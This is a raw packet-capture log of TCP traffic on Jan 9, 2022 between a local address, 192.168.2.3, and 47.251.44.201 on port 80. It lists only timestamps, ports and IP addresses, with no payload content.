Jan 9, 2022 18:48:51.047507048 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047513962 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047543049 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047581911 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047590017 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047620058 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047668934 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.066126108 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.077744961 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.077800035 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.077836990 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.077863932 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.077876091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.077918053 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.077933073 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.077956915 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.077996016 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078006029 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078033924 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078072071 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078083038 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078109980 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078146935 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078160048 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078185081 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078223944 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078233004 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078263044 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078301907 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078313112 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078340054 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078378916 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078387022 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078417063 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078453064 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078463078 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078491926 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078531981 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078540087 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078571081 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078609943 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078615904 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078646898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078685045 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078694105 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078722954 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078758955 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078768015 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078798056 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078835964 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078850031 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078875065 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078915119 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078922987 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.078952074 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.078989983 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079013109 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079027891 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079063892 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079077005 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079102039 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079139948 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079149008 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079179049 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079217911 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079229116 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079255104 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079293013 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079308033 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079332113 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079368114 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079380989 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079406023 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079443932 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079452991 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079482079 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079521894 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079530001 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079557896 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079597950 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079603910 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079636097 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079673052 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079680920 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079711914 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079749107 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079765081 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079788923 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079828024 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079838037 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079866886 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079905987 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079914093 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.079943895 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079979897 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.079993963 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.080018997 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.080056906 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.080066919 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.080096006 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.080115080 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.080135107 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.080143929 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.080172062 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.080209017 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.080223083 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.080248117 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.080297947 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.081516027 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.228611946 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.228720903 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.228800058 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.228822947 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.228960037 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229001045 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229016066 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229083061 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229123116 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229131937 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229190111 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229229927 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229243994 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229269028 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229305983 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229342937 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229348898 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229381084 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229391098 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229418993 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229458094 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229474068 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229496956 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229532957 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229546070 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229572058 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229609966 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229626894 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229650021 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229687929 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229696989 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229727030 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229764938 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229777098 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229804993 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229840994 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229854107 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229878902 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229918003 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229927063 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.229954004 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.229991913 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230001926 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230030060 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230067968 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230083942 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230107069 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230143070 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230158091 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230181932 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230220079 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230228901 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230257034 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230293989 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230307102 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230331898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230370045 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230376959 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230408907 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230444908 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230458975 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230484009 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230521917 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230535984 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230559111 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230596066 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230606079 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230633020 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230670929 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230680943 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230710030 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230746031 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230758905 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230782986 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230819941 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230829954 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230856895 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230895042 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230910063 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.230932951 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230969906 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.230981112 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.231009960 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.231046915 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.231060028 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.231084108 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.231122017 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.231136084 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.231158972 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.231197119 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.231205940 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.231234074 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.231283903 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.247250080 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.251024008 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261224031 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261332989 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261403084 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261403084 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261461020 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261487007 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261523962 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261562109 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261575937 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261600018 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261639118 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261648893 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261678934 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261715889 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261729002 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261754036 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261791945 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261801958 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261830091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261868954 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261878014 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261908054 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261946917 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.261960983 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.261985064 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262021065 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262034893 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262059927 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262098074 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262106895 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262134075 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262171984 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262181997 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262209892 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262249947 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262259007 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262289047 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262325048 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262340069 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262363911 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262401104 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262415886 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262437105 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262474060 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262482882 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262511969 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262548923 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262562990 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262588024 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262624979 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262638092 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262664080 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262701988 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262712955 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262738943 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262777090 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262790918 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262814045 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262851954 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262861967 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262892008 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262931108 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.262939930 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.262969971 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263008118 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263020992 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263044119 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263082027 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263089895 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263118982 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263156891 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263174057 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263183117 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263195038 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263231039 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263243914 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263268948 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263307095 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263320923 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263343096 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263381004 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263389111 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263418913 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263456106 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263465881 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263495922 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263531923 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263546944 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263571024 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263607979 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263617992 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263643980 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263681889 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263691902 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263719082 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263756990 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263767004 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263796091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263832092 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263844013 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263870001 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263911009 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263919115 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.263947010 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.263994932 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.266016006 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.269455910 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.412312031 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412367105 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412404060 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412442923 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412480116 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412518978 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412558079 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412595034 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412606955 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.412631035 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.412631989 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412636042 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.412641048 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.412672043 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412708044 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412745953 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412750006 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.412784100 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412801027 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.412826061 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412880898 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.412903070 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412946939 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.412983894 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413005114 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413022041 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413060904 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413078070 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413100958 CET	80	49865	47.251.44.201	192.168.2.3
